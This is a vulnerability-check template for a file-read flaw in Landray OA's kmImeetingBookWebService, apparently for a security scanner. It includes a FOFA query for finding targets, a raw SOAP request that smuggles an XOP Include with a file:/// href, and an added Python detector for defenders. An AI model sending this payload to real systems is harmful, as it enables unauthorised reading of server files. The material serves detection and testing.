Vulnerability Description
Landray OA System kmImeetingBookWebService interface has an arbitrary file read vulnerability.
The vulnerability exists in the getImeetingBookLists method which can be exploited to read arbitrary files on the system.
FOFA: body="Com_Parameter"
id: landray-oa-kmImeetingBookWebService-fileread

info:
  name: Landray OA kmImeetingBookWebService File Read
  author: ZacharyZcR
  severity: high
  verified: true
  description: |
    Landray OA System kmImeetingBookWebService interface has an arbitrary file read vulnerability.
    The vulnerability exists in the getImeetingBookLists method which can be exploited to read arbitrary files on the system.
    FOFA: body="Com_Parameter"
  reference:
    - https://github.com/wy876/POC/blob/9f20511bb02d7babac30c47f48a72d427b7f5a3b/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8CEKP%E7%B3%BB%E7%BB%9F%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88.md
  tags: landray,fileread
  created: 2024/12/30

set:
  rboundary: randomLowercase(8)
  hostname: request.url.host

rules:
  r0:
    request:
      raw: |-
        POST /sys/webservice/kmImeetingBookWebService HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
        Connection: close
        Content-Type: multipart/related; boundary=----{{rboundary}}
        SOAPAction: ""
        Accept-Encoding: gzip, deflate

        ------{{rboundary}}
        Content-Disposition: form-data; name="a"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.imeeting.km.kmss.landray.com/">
          <soapenv:Header/>
          <soapenv:Body>
            <web:getImeetingBookLists>
              <arg0>
                <beginTimeStamp>a</beginTimeStamp>
                <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"/></count>
              </arg0>
            </web:getImeetingBookLists>
          </soapenv:Body>
        </soapenv:Envelope>
        ------{{rboundary}}--
    expression: response.status == 500 && response.body.bcontains(b'Unmarshalling Error')

expression: r0()
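
Added example for defenders, not part of the original template: a Python check that flags SOAP requests under /sys/webservice/ whose XOP Include href is not a cid: reference (XOP uses cid: URIs to point at attached MIME parts), and records whether the response matches the template's expression. The function names and sample bodies are constructed for illustration.

```python
import re
from typing import List, Optional
from urllib.parse import urlsplit

XOP_NS = "http://www.w3.org/2004/08/xop/include"
# Include element with any namespace prefix; captures the quoted href value.
INCLUDE_RE = re.compile(
    r"<(?:[\w.-]+:)?Include\b[^>]*?\bhref\s*=\s*([\"'])(.*?)\1", re.I | re.S)

# Constructed sample bodies: only the element that matters is shown.
SAMPLE_SUSPICIOUS = '<count><xop:Include xmlns:xop="%s" href="file:///"/></count>' % XOP_NS
SAMPLE_BENIGN = '<count><xop:Include xmlns:xop="%s" href="cid:part1@example.org"/></count>' % XOP_NS

def _scheme(href: str) -> str:
    """Lower-cased URI scheme, or '' when the value cannot be parsed."""
    try:
        return urlsplit(href.strip()).scheme.lower()
    except ValueError:
        return ""

def suspicious_xop_hrefs(body: str) -> List[str]:
    """Return href values of XOP Include elements that are not cid: URIs."""
    if XOP_NS not in body:
        return []
    return [href for _, href in INCLUDE_RE.findall(body) if _scheme(href) != "cid"]

def inspect_exchange(path: str, content_type: str, body: str,
                     status: Optional[int] = None, resp_body: str = "") -> Optional[dict]:
    """Flag a request/response pair; returns None when nothing is suspicious."""
    if not urlsplit(path).path.lower().startswith("/sys/webservice/"):
        return None
    hrefs = suspicious_xop_hrefs(body)
    if not hrefs:
        return None
    return {
        "path": path,
        "multipart_related": "multipart/related" in content_type.lower(),
        "hrefs": hrefs,
        # Same condition as the template's rule expression.
        "response_matches_template": status == 500 and "Unmarshalling Error" in resp_body,
    }

if __name__ == "__main__":
    print(inspect_exchange("/sys/webservice/kmImeetingBookWebService",
                           "multipart/related; boundary=----abcdefgh",
                           SAMPLE_SUSPICIOUS, 500, "Unmarshalling Error: ..."))
```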